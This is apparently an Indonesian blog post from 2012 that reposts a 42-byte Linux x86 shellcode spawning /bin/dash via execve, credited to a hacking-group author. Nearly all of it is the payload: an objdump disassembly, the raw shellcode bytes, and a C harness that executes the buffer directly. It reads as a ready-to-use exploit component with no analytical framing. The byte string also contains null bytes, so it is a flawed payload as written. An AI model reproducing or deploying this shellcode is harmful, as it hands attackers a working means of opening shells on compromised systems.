Selasa, 26 Juni 2012

exploit linux/x86 execve(/bin/dash) 42 bytes

Sumber   :http://www.exploit-id.com/shellcode/linuxx86-execvebindash-42-bytes 
 
 Codenya   : 
 
 
/*
linux/x86 execve(/bin/dash) 42 bytes
Author : X-h4ck
mem001@live.com, mem003@live.com
www.pirate.al , www.flashcrew.in
Greetz : mywisdom - Danzel - Wulns~ - IllyrianWarrior- Ace - M4yh3m - Saldeath
ev1lut1on - Lekosta - Pretorian - bi0 - Slimshaddy - d3trimentaL
CR - Hack-Down - H3ll - d4nte_sA - th3p0wer and all PirateAL friends.
PROUD TO BE ALBANIAN!
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
root@bt:~/Desktop# objdump -D sh
sh: file format elf32-i386
Disassembly of section .text:
08048060 :
8048060: eb 19 jmp 0x804807b
8048062: 5b pop %ebx
8048063: b8 00 00 00 00 mov $0x0,%eax
8048068: 88 43 09 mov %al,0x9(%ebx)
804806b: 89 5b 0a mov %ebx,0xa(%ebx)
804806e: 89 43 0e mov %eax,0xe(%ebx)
8048071: b0 0b mov $0xb,%al
8048073: 8d 4b 0a lea 0xa(%ebx),%ecx
8048076: 8d 53 0e lea 0xe(%ebx),%edx
8048079: cd 80 int $0x80
804807b: e8 e2 ff ff ff call 0x8048062
8048080: 2f das
8048081: 62 69 6e bound %ebp,0x6e(%ecx)
8048084: 2f das
8048085: 64 fs
8048086: 61 popa
8048087: 73 68 jae 0x80480f1
*/
#include
char sc[] = "\xeb\x19\x5b\xb8\x00\x00\x00\x00\x88"
"\x43\x09\x89\x5b\x0a\x89\x43\x0e\xb0"
"\x0b\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80"
"\xe8\xe2\xff\xff\xff\x2f\x62\x69\x6e"
"\x2f\x64\x61\x73\x68";
void main(void)
{
void(*s)(void);
printf("madhesia : %d\n", sizeof(sc));
s = sc;
s();
}
Load disqus comments

0 komentar